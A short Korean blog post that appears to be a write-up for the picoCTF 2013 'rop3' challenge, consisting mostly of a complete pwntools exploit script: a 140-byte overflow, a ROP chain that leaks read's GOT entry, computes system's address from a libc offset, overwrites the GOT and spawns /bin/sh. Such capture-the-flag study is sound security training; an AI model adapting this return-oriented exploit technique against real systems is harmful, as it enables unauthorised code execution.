[pico CTF 2013] rop3
2018. 8. 16. 08:45ㆍCTF's Write-up
pico CTF Rop3번문제 (grin)
취약점 분석!
똑..같다 ㅎ
하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ
저번에푼rop공룡같이 풀어본다!!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | from pwn import * r = process("./rop3") payload = "" read_plt = 0x08048360 read_got = 0x0804a000 write_plt = 0x080483a0 shell = "/bin/sh" bss = 0x0804a020 offset = 0x9ad60 pppr = 0x804855d payload += "A"*140 payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8) payload += p32(write_plt) + p32(pppr) + p32(1) + p32(read_got) + p32(4) payload += p32(read_plt) + p32(pppr) + p32(0) + p32(read_got) + p32(4) payload += p32(read_plt) + "AAAA" + p32(bss) r.send(payload) sleep(0.4) r.send(shell) sleep(0.5) readoffset = u32(r.recv(4)) system = readoffset - offset print(system) r.send(p32(system)) r.interactive() | cs |
(grin)
'CTF's Write-up' 카테고리의 다른 글
| [TJCTF2018] - Vinegar (0) | 2018.08.19 |
|---|---|
| [pico CTF 2013] rop4 (0) | 2018.08.16 |
| [pico CTF 2013] rop2 (0) | 2018.08.16 |
| [TJCTF2018] - Cookie monster (0) | 2018.08.16 |
| [pico CTF 2013] rop1 (0) | 2018.08.15 |